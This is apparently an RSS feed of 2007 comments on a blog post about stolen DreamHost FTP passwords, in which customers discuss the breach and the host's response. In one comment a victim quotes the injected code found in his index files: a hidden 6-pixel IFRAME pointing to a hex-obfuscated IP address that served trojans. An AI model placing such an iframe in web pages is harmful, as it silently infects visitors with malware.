<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: DreamHost FTP Accounts Hacked</title>
	<atom:link href="http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/</link>
	<description>Tips &#038; Tricks for Dreamhosters</description>
	<lastBuildDate>Thu, 09 Oct 2008 16:48:15 -0700</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: bilgisayar-destek &#187; 3500 DreamHost Müşterisinin Şifreleri Çalındı!</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7817</link>
		<dc:creator>bilgisayar-destek &#187; 3500 DreamHost Müşterisinin Şifreleri Çalındı!</dc:creator>
		<pubDate>Thu, 19 Jul 2007 22:11:50 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7817</guid>
		<description>[...] Dreamhost blogunda, son iki haftada 3500 DreamHost’çunun FTP şifrelerinin çalındığı haberi yer aldı.Dreamhost ekibi, şifre çalınmasıyla ilgili olarak kullanıcılara bir e-mail gönderdi. [...]</description>
		<content:encoded><![CDATA[<p>[...] Dreamhost blogunda, son iki haftada 3500 DreamHost’çunun FTP şifrelerinin çalındığı haberi yer aldı.Dreamhost ekibi, şifre çalınmasıyla ilgili olarak kullanıcılara bir e-mail gönderdi. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Neuville</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7808</link>
		<dc:creator>Neuville</dc:creator>
		<pubDate>Sat, 07 Jul 2007 07:58:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7808</guid>
		<description>Hello There,
I&#039;m not with dreamhost, but my website was hacked exactly the same way.i&#039;m hosted at Aruba, an italian provider, and running wordpress.

The hacks happen since I upgrade to wp 2.2.1

Any idea on how to solve? I&#039;ve deleted the hack lines on the index.php yesterday night, but this morning they were there again. I&#039;ve already asked to change my ftp password and waiting a response from the people at Aruba</description>
		<content:encoded><![CDATA[<p>Hello There,<br />
I&#8217;m not with dreamhost, but my website was hacked exactly the same way.i&#8217;m hosted at Aruba, an italian provider, and running wordpress.</p>
<p>The hacks happen since I upgrade to wp 2.2.1</p>
<p>Any idea on how to solve? I&#8217;ve deleted the hack lines on the index.php yesterday night, but this morning they were there again. I&#8217;ve already asked to change my ftp password and waiting a response from the people at Aruba</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Unofficial DreamHost Blog &#187; Blog Archive &#187; DreamHost Newsletter - July 2007</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7802</link>
		<dc:creator>Unofficial DreamHost Blog &#187; Blog Archive &#187; DreamHost Newsletter - July 2007</dc:creator>
		<pubDate>Wed, 04 Jul 2007 08:35:13 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7802</guid>
		<description>[...] Hack Explanation Latest info about the compromised FTP passwords in the blog. Apparently the main problem was users using FTP (which is an unencrypted protocol) [...]</description>
		<content:encoded><![CDATA[<p>[...] Hack Explanation Latest info about the compromised FTP passwords in the blog. Apparently the main problem was users using FTP (which is an unencrypted protocol) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Unofficial DreamHost Blog</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7794</link>
		<dc:creator>Unofficial DreamHost Blog</dc:creator>
		<pubDate>Fri, 22 Jun 2007 11:45:43 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7794</guid>
		<description>fuck dreamhost - If your password has been compromised I think it is very responsible to close access to your FTP account. It was always &lt;a href=&quot;http://www.dreamhoststatus.com/2007/06/06/security-breach/&quot; rel=&quot;nofollow&quot;&gt;warned about on the status blog&lt;/a&gt;:
&lt;blockquote&gt;We are now forcing all of the affected users who have not yet changed their passwords to do so before they will be able to upload anything again. This is necessary so we can continue to monitor the situation and see clearly what’s going on.&lt;/blockquote&gt;</description>
		<content:encoded><![CDATA[<p>fuck dreamhost &#8211; If your password has been compromised I think it is very responsible to close access to your FTP account. It was always <a href="http://www.dreamhoststatus.com/2007/06/06/security-breach/" rel="nofollow">warned about on the status blog</a>:</p>
<blockquote><p>We are now forcing all of the affected users who have not yet changed their passwords to do so before they will be able to upload anything again. This is necessary so we can continue to monitor the situation and see clearly what’s going on.</p></blockquote>
]]></content:encoded>
	</item>
	<item>
		<title>By: fuck dreamhost</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7793</link>
		<dc:creator>fuck dreamhost</dc:creator>
		<pubDate>Wed, 20 Jun 2007 18:57:46 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7793</guid>
		<description>they also manually close your ftp and http without warning!!!</description>
		<content:encoded><![CDATA[<p>they also manually close your ftp and http without warning!!!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tim</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7744</link>
		<dc:creator>Tim</dc:creator>
		<pubDate>Tue, 12 Jun 2007 01:25:55 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7744</guid>
		<description>Looks like DreamHost upgraded the WebFTP (which is located with the panel for your domain).</description>
		<content:encoded><![CDATA[<p>Looks like DreamHost upgraded the WebFTP (which is located with the panel for your domain).</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daniel</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7726</link>
		<dc:creator>Daniel</dc:creator>
		<pubDate>Fri, 08 Jun 2007 11:00:39 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7726</guid>
		<description>It would be nice if we had a list of the hacked server names…</description>
		<content:encoded><![CDATA[<p>It would be nice if we had a list of the hacked server names…</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: danielsemper</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7725</link>
		<dc:creator>danielsemper</dc:creator>
		<pubDate>Fri, 08 Jun 2007 03:34:59 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7725</guid>
		<description>I suffered form 2 different changes.

1.- The spam links
2.- An IFRAME code that goes to a web page with trojans and viruses that made my friends reinstall Windows. You have a Black screen after you open the page with IE6 and thats it.

The code inserted in my index.html and index.php files was this one: 

&lt;code&gt;IFRAME src=&#039;http://0xcb.0xdf.0x9e.0x0c/t&#039; width=&#039;6&#039; height=&#039;6&#039; style=&#039;visibility: hidden;&#039;&gt; 

So this action is not for PR, is just evil.</description>
		<content:encoded><![CDATA[<p>I suffered form 2 different changes.</p>
<p>1.- The spam links<br />
2.- An IFRAME code that goes to a web page with trojans and viruses that made my friends reinstall Windows. You have a Black screen after you open the page with IE6 and thats it.</p>
<p>The code inserted in my index.html and index.php files was this one: </p>
<p><code>IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'&gt; </p>
<p>So this action is not for PR, is just evil.</code></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Will</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7724</link>
		<dc:creator>Will</dc:creator>
		<pubDate>Fri, 08 Jun 2007 00:57:10 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7724</guid>
		<description>They&#039;ve also removed the password from being shown when you click on a user. However, the one for the mysql user is still shown.</description>
		<content:encoded><![CDATA[<p>They&#8217;ve also removed the password from being shown when you click on a user. However, the one for the mysql user is still shown.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mike</title>
		<link>http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/comment-page-1/#comment-7718</link>
		<dc:creator>Mike</dc:creator>
		<pubDate>Thu, 07 Jun 2007 08:32:23 +0000</pubDate>
		<guid isPermaLink="false">http://blog.dreamhosters.com/2007/06/06/dreamhost-ftp-accounts-hacked/#comment-7718</guid>
		<description>Just a quick note:  

&lt;blockquote&gt;approximately 3,500 DreamHost users have had their FTP account passwords stolen&lt;/blockquote&gt; 

To avoid confusion with the DH wording:

&lt;blockquote&gt;approximately 3,500 separate FTP accounts&lt;/blockquote&gt;

Keep in mind that an L4 account can have up to 775 FTP users and even the L1 plan can have up to 75.   I think many people are taking the 3,500 number as the number of customers affected.

Just something to consider, especially since a lot of people resell on DH and could be running 1 domain per FTP user.  Then add in those that create users for friends, family members, etc...  or even just different users for their own domains.

Personally, I&#039;m more disturbed by them having panel access, than I am by the FTP stats... but that&#039;s just me. ;-)</description>
		<content:encoded><![CDATA[<p>Just a quick note:  </p>
<blockquote><p>approximately 3,500 DreamHost users have had their FTP account passwords stolen</p></blockquote>
<p>To avoid confusion with the DH wording:</p>
<blockquote><p>approximately 3,500 separate FTP accounts</p></blockquote>
<p>Keep in mind that an L4 account can have up to 775 FTP users and even the L1 plan can have up to 75.   I think many people are taking the 3,500 number as the number of customers affected.</p>
<p>Just something to consider, especially since a lot of people resell on DH and could be running 1 domain per FTP user.  Then add in those that create users for friends, family members, etc&#8230;  or even just different users for their own domains.</p>
<p>Personally, I&#8217;m more disturbed by them having panel access, than I am by the FTP stats&#8230; but that&#8217;s just me. <img src='http://blog.dreamhosters.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
</channel>
</rss>

<!-- Dynamic Page Served (once) in 0.148 seconds -->
